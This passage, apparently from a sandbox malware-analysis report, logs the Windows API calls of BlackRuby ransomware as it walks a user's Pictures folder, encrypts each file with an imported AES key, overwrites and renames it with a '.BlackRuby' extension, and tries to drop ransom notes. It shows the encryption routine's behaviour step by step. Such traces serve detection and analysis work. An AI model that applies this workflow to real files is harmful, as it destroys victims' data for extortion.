lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x4f [0061.624] GetLastError () returned 0xb7 [0061.624] SetErrorMode (uMode=0x1) returned 0x0 [0061.624] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0061.625] GetLastError () returned 0x5 [0061.625] SetErrorMode (uMode=0x0) returned 0x1 [0061.626] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\N7FNQxj-jC_1tDa.bmp", nBufferLength=0x105, lpBuffer=0x18e8b4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\N7FNQxj-jC_1tDa.bmp", lpFilePart=0x0) returned 0x4a [0061.626] GetLastError () returned 0x5 [0061.626] SetErrorMode (uMode=0x1) returned 0x0 [0061.626] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\N7FNQxj-jC_1tDa.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\n7fnqxj-jc_1tda.bmp"), fInfoLevelId=0x0, lpFileInformation=0x1cb4c74 | out: lpFileInformation=0x1cb4c74*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30494770, ftCreationTime.dwHighDateTime=0x1d34c80, ftLastAccessTime.dwLowDateTime=0xccefcdb0, ftLastAccessTime.dwHighDateTime=0x1d35842, ftLastWriteTime.dwLowDateTime=0xccefcdb0, ftLastWriteTime.dwHighDateTime=0x1d35842, nFileSizeHigh=0x0, nFileSizeLow=0x175b2)) returned 1 [0061.626] GetLastError () returned 0x5 [0061.626] SetErrorMode (uMode=0x0) returned 0x1 [0061.626] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\N7FNQxj-jC_1tDa.bmp", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\N7FNQxj-jC_1tDa.bmp", lpFilePart=0x0) returned 0x4a [0061.626] GetLastError () returned 0x5 [0061.626] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\N7FNQxj-jC_1tDa.bmp", nBufferLength=0x105, lpBuffer=0x18e750, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\N7FNQxj-jC_1tDa.bmp", lpFilePart=0x0) returned 0x4a [0061.626] GetLastError () returned 0x5 [0061.626] SetErrorMode (uMode=0x1) returned 0x0 [0061.626] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\N7FNQxj-jC_1tDa.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\n7fnqxj-jc_1tda.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0061.626] GetLastError () returned 0x0 [0061.626] GetFileType (hFile=0x258) returned 0x1 [0061.626] SetErrorMode (uMode=0x0) returned 0x1 [0061.626] GetFileType (hFile=0x258) returned 0x1 [0061.626] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18ed04 | out: lpFileSizeHigh=0x18ed04*=0x0) returned 0x175b2 [0061.626] GetLastError () returned 0x0 [0061.627] ReadFile (in: hFile=0x258, lpBuffer=0x2e54860, nNumberOfBytesToRead=0x175b2, lpNumberOfBytesRead=0x18ecac, lpOverlapped=0x0 | out: lpBuffer=0x2e54860*, lpNumberOfBytesRead=0x18ecac*=0x175b2, lpOverlapped=0x0) returned 1 [0061.628] GetLastError () returned 0x0 [0061.628] CloseHandle (hObject=0x258) returned 1 [0061.628] GetLastError () returned 0x0 [0061.629] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\N7FNQxj-jC_1tDa.bmp", nBufferLength=0x105, lpBuffer=0x18e860, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\N7FNQxj-jC_1tDa.bmp", lpFilePart=0x0) returned 0x4a [0061.629] GetLastError () returned 0x0 [0061.629] SetErrorMode (uMode=0x1) returned 0x0 [0061.629] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\N7FNQxj-jC_1tDa.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\n7fnqxj-jc_1tda.bmp"), fInfoLevelId=0x0, lpFileInformation=0x18ed14 | out: lpFileInformation=0x18ed14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30494770, ftCreationTime.dwHighDateTime=0x1d34c80, ftLastAccessTime.dwLowDateTime=0xccefcdb0, ftLastAccessTime.dwHighDateTime=0x1d35842, ftLastWriteTime.dwLowDateTime=0xccefcdb0, ftLastWriteTime.dwHighDateTime=0x1d35842, nFileSizeHigh=0x0, nFileSizeLow=0x175b2)) returned 1 [0061.629] GetLastError () returned 0x0 [0061.629] SetErrorMode (uMode=0x0) returned 0x1 [0061.640] CryptImportKey (in: hProv=0x37c790, pbData=0x1d11018, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ec50 | out: phKey=0x18ec50*=0x360f60) returned 1 [0061.640] GetLastError () returned 0x0 [0061.640] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.640] GetLastError () returned 0x0 [0061.645] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.645] GetLastError () returned 0x0 [0061.645] CryptDuplicateKey (in: hKey=0x360f60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec0c | out: phKey=0x18ec0c*=0x360ce0) returned 1 [0061.645] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.645] GetLastError () returned 0x0 [0061.645] CryptSetKeyParam (hKey=0x360ce0, dwParam=0x4, pbData=0x1d3e064*=0x1, dwFlags=0x0) returned 1 [0061.645] GetLastError () returned 0x0 [0061.645] CryptSetKeyParam (hKey=0x360ce0, dwParam=0x1, pbData=0x1d3e030, dwFlags=0x0) returned 1 [0061.645] GetLastError () returned 0x0 [0061.647] CryptEncrypt (in: hKey=0x360ce0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2e83500*, pdwDataLen=0x18ec9c*=0x176b0, dwBufLen=0x176b0 | out: pbData=0x2e83500*, pdwDataLen=0x18ec9c*=0x176b0) returned 1 [0061.647] GetLastError () returned 0x0 [0061.660] CryptEncrypt (in: hKey=0x360ce0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b22cf0*, pdwDataLen=0x18ecb4*=0x10, dwBufLen=0x10 | out: pbData=0x1b22cf0*, pdwDataLen=0x18ecb4*=0x10) returned 1 [0061.660] GetLastError () returned 0x0 [0061.660] CryptEncrypt (in: hKey=0x360ce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b22d20*, pdwDataLen=0x18ecbc*=0x0, dwBufLen=0x10 | out: pbData=0x1b22d20*, pdwDataLen=0x18ecbc*=0x10) returned 1 [0061.660] GetLastError () returned 0x0 [0061.662] CryptDestroyKey (hKey=0x360f60) returned 1 [0061.662] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0061.662] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0061.662] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\N7FNQxj-jC_1tDa.bmp", nBufferLength=0x105, lpBuffer=0x18e758, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\N7FNQxj-jC_1tDa.bmp", lpFilePart=0x0) returned 0x4a [0061.662] GetLastError () returned 0x0 [0061.662] SetErrorMode (uMode=0x1) returned 0x0 [0061.662] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\N7FNQxj-jC_1tDa.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\n7fnqxj-jc_1tda.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0061.664] GetLastError () returned 0xb7 [0061.664] GetFileType (hFile=0x258) returned 0x1 [0061.664] SetErrorMode (uMode=0x0) returned 0x1 [0061.664] GetFileType (hFile=0x258) returned 0x1 [0061.664] WriteFile (in: hFile=0x258, lpBuffer=0x2b2e8a0*, nNumberOfBytesToWrite=0x176c0, lpNumberOfBytesWritten=0x18ecb8, lpOverlapped=0x0 | out: lpBuffer=0x2b2e8a0*, lpNumberOfBytesWritten=0x18ecb8*=0x176c0, lpOverlapped=0x0) returned 1 [0061.666] GetLastError () returned 0xb7 [0061.666] CloseHandle (hObject=0x258) returned 1 [0061.667] GetLastError () returned 0xb7 [0061.667] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\N7FNQxj-jC_1tDa.bmp", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\N7FNQxj-jC_1tDa.bmp", lpFilePart=0x0) returned 0x4a [0061.667] GetLastError () returned 0xb7 [0061.667] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Encrypted_lEePGDozkTjXyMC9t0Q7vjzq9Q6X0Wc3fsymkUAdJYhPvfn.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Encrypted_lEePGDozkTjXyMC9t0Q7vjzq9Q6X0Wc3fsymkUAdJYhPvfn.BlackRuby", lpFilePart=0x0) returned 0x7a [0061.667] GetLastError () returned 0xb7 [0061.667] SetErrorMode (uMode=0x1) returned 0x0 [0061.667] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\N7FNQxj-jC_1tDa.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\n7fnqxj-jc_1tda.bmp"), fInfoLevelId=0x0, lpFileInformation=0x18ecfc | out: lpFileInformation=0x18ecfc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30494770, ftCreationTime.dwHighDateTime=0x1d34c80, ftLastAccessTime.dwLowDateTime=0xccefcdb0, ftLastAccessTime.dwHighDateTime=0x1d35842, ftLastWriteTime.dwLowDateTime=0x2cf26b60, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x176c0)) returned 1 [0061.667] GetLastError () returned 0xb7 [0061.667] SetErrorMode (uMode=0x0) returned 0x1 [0061.667] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\N7FNQxj-jC_1tDa.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\n7fnqxj-jc_1tda.bmp"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Encrypted_lEePGDozkTjXyMC9t0Q7vjzq9Q6X0Wc3fsymkUAdJYhPvfn.BlackRuby" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\encrypted_leepgdozktjxymc9t0q7vjzq9q6x0wc3fsymkuadjyhpvfn.blackruby")) returned 1 [0061.668] GetLastError () returned 0xb7 [0061.669] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e760, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x4f [0061.669] GetLastError () returned 0xb7 [0061.669] SetErrorMode (uMode=0x1) returned 0x0 [0061.669] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0061.669] GetLastError () returned 0x5 [0061.670] SetErrorMode (uMode=0x0) returned 0x1 [0061.670] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN", nBufferLength=0x105, lpBuffer=0x18e8bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN", lpFilePart=0x0) returned 0x42 [0061.670] GetLastError () returned 0x5 [0061.670] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0061.670] GetLastError () returned 0x5 [0061.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0061.670] GetLastError () returned 0x5 [0061.670] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN", lpFilePart=0x0) returned 0x42 [0061.670] GetLastError () returned 0x5 [0061.670] SetErrorMode (uMode=0x1) returned 0x0 [0061.670] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0061.671] GetLastError () returned 0x5 [0061.671] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.671] GetLastError () returned 0x5 [0061.671] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.671] GetLastError () returned 0x5 [0061.671] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.671] GetLastError () returned 0x5 [0061.671] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.671] GetLastError () returned 0x5 [0061.671] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.671] GetLastError () returned 0x5 [0061.671] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0061.671] GetLastError () returned 0x12 [0061.671] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0061.672] SetErrorMode (uMode=0x0) returned 0x1 [0061.672] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN", lpFilePart=0x0) returned 0x42 [0061.672] GetLastError () returned 0x12 [0061.672] SetErrorMode (uMode=0x1) returned 0x0 [0061.672] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0061.672] GetLastError () returned 0x12 [0061.672] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.672] GetLastError () returned 0x12 [0061.672] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.672] GetLastError () returned 0x12 [0061.672] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.672] GetLastError () returned 0x12 [0061.672] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.672] GetLastError () returned 0x12 [0061.673] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.673] GetLastError () returned 0x12 [0061.673] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0061.673] GetLastError () returned 0x12 [0061.673] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0061.673] SetErrorMode (uMode=0x0) returned 0x1 [0061.673] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\FoFXoZ1ya_jlMxBHGnV.gif", nBufferLength=0x105, lpBuffer=0x18e848, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\FoFXoZ1ya_jlMxBHGnV.gif", lpFilePart=0x0) returned 0x5a [0061.673] GetLastError () returned 0x12 [0061.673] SetErrorMode (uMode=0x1) returned 0x0 [0061.673] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\FoFXoZ1ya_jlMxBHGnV.gif" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\nor_13lnnjn\\fofxoz1ya_jlmxbhgnv.gif"), fInfoLevelId=0x0, lpFileInformation=0x1b41eb4 | out: lpFileInformation=0x1b41eb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7b54db0, ftCreationTime.dwHighDateTime=0x1d3509e, ftLastAccessTime.dwLowDateTime=0xc9c5c5c0, ftLastAccessTime.dwHighDateTime=0x1d356b4, ftLastWriteTime.dwLowDateTime=0xc9c5c5c0, ftLastWriteTime.dwHighDateTime=0x1d356b4, nFileSizeHigh=0x0, nFileSizeLow=0x1e78)) returned 1 [0061.673] GetLastError () returned 0x12 [0061.673] SetErrorMode (uMode=0x0) returned 0x1 [0061.673] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\FoFXoZ1ya_jlMxBHGnV.gif", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\FoFXoZ1ya_jlMxBHGnV.gif", lpFilePart=0x0) returned 0x5a [0061.673] GetLastError () returned 0x12 [0061.673] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\FoFXoZ1ya_jlMxBHGnV.gif", nBufferLength=0x105, lpBuffer=0x18e6e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\FoFXoZ1ya_jlMxBHGnV.gif", lpFilePart=0x0) returned 0x5a [0061.673] GetLastError () returned 0x12 [0061.673] SetErrorMode (uMode=0x1) returned 0x0 [0061.674] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\FoFXoZ1ya_jlMxBHGnV.gif" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\nor_13lnnjn\\fofxoz1ya_jlmxbhgnv.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0061.674] GetLastError () returned 0x0 [0061.674] GetFileType (hFile=0x258) returned 0x1 [0061.674] SetErrorMode (uMode=0x0) returned 0x1 [0061.674] GetFileType (hFile=0x258) returned 0x1 [0061.674] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18ec98 | out: lpFileSizeHigh=0x18ec98*=0x0) returned 0x1e78 [0061.674] GetLastError () returned 0x0 [0061.674] ReadFile (in: hFile=0x258, lpBuffer=0x1b43f10, nNumberOfBytesToRead=0x1e78, lpNumberOfBytesRead=0x18ec40, lpOverlapped=0x0 | out: lpBuffer=0x1b43f10*, lpNumberOfBytesRead=0x18ec40*=0x1e78, lpOverlapped=0x0) returned 1 [0061.675] GetLastError () returned 0x0 [0061.675] CloseHandle (hObject=0x258) returned 1 [0061.675] GetLastError () returned 0x0 [0061.675] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\FoFXoZ1ya_jlMxBHGnV.gif", nBufferLength=0x105, lpBuffer=0x18e7f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\FoFXoZ1ya_jlMxBHGnV.gif", lpFilePart=0x0) returned 0x5a [0061.675] GetLastError () returned 0x0 [0061.675] SetErrorMode (uMode=0x1) returned 0x0 [0061.675] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\FoFXoZ1ya_jlMxBHGnV.gif" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\nor_13lnnjn\\fofxoz1ya_jlmxbhgnv.gif"), fInfoLevelId=0x0, lpFileInformation=0x18eca8 | out: lpFileInformation=0x18eca8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7b54db0, ftCreationTime.dwHighDateTime=0x1d3509e, ftLastAccessTime.dwLowDateTime=0xc9c5c5c0, ftLastAccessTime.dwHighDateTime=0x1d356b4, ftLastWriteTime.dwLowDateTime=0xc9c5c5c0, ftLastWriteTime.dwHighDateTime=0x1d356b4, nFileSizeHigh=0x0, nFileSizeLow=0x1e78)) returned 1 [0061.675] GetLastError () returned 0x0 [0061.675] SetErrorMode (uMode=0x0) returned 0x1 [0061.675] CryptAcquireContextW (in: phProv=0x18ec08, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ec08*=0x37c818) returned 1 [0061.675] GetLastError () returned 0x0 [0061.727] CryptImportKey (in: hProv=0x37c818, pbData=0x1ba2024, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ebe4 | out: phKey=0x18ebe4*=0x360de0) returned 1 [0061.727] GetLastError () returned 0x0 [0061.727] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.727] GetLastError () returned 0x0 [0061.733] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.733] GetLastError () returned 0x0 [0061.733] CryptDuplicateKey (in: hKey=0x360de0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eba0 | out: phKey=0x18eba0*=0x360ae0) returned 1 [0061.733] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.733] GetLastError () returned 0x0 [0061.733] CryptSetKeyParam (hKey=0x360ae0, dwParam=0x4, pbData=0x1bcf070*=0x1, dwFlags=0x0) returned 1 [0061.733] GetLastError () returned 0x0 [0061.733] CryptSetKeyParam (hKey=0x360ae0, dwParam=0x1, pbData=0x1bcf03c, dwFlags=0x0) returned 1 [0061.733] GetLastError () returned 0x0 [0061.733] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bcf0b8*, pdwDataLen=0x18ec30*=0x1f70, dwBufLen=0x1f70 | out: pbData=0x1bcf0b8*, pdwDataLen=0x18ec30*=0x1f70) returned 1 [0061.733] GetLastError () returned 0x0 [0061.733] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bd2fc4*, pdwDataLen=0x18ec48*=0x10, dwBufLen=0x10 | out: pbData=0x1bd2fc4*, pdwDataLen=0x18ec48*=0x10) returned 1 [0061.733] GetLastError () returned 0x0 [0061.733] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1bd2ff4*, pdwDataLen=0x18ec50*=0x0, dwBufLen=0x10 | out: pbData=0x1bd2ff4*, pdwDataLen=0x18ec50*=0x10) returned 1 [0061.733] GetLastError () returned 0x0 [0061.733] CryptDestroyKey (hKey=0x360de0) returned 1 [0061.733] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0061.733] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0061.735] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\FoFXoZ1ya_jlMxBHGnV.gif", nBufferLength=0x105, lpBuffer=0x18e6ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\FoFXoZ1ya_jlMxBHGnV.gif", lpFilePart=0x0) returned 0x5a [0061.735] GetLastError () returned 0x0 [0061.736] SetErrorMode (uMode=0x1) returned 0x0 [0061.736] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\FoFXoZ1ya_jlMxBHGnV.gif" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\nor_13lnnjn\\fofxoz1ya_jlmxbhgnv.gif"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0061.739] GetLastError () returned 0xb7 [0061.739] GetFileType (hFile=0x258) returned 0x1 [0061.739] SetErrorMode (uMode=0x0) returned 0x1 [0061.739] GetFileType (hFile=0x258) returned 0x1 [0061.743] CloseHandle (hObject=0x258) returned 1 [0061.743] GetLastError () returned 0xb7 [0061.743] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\FoFXoZ1ya_jlMxBHGnV.gif", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\FoFXoZ1ya_jlMxBHGnV.gif", lpFilePart=0x0) returned 0x5a [0061.743] GetLastError () returned 0xb7 [0061.743] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\Encrypted_Y6gdLHOo66QqQFYt3QcLSfPSMqDW1szwqH2ilYqiMR.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e810, 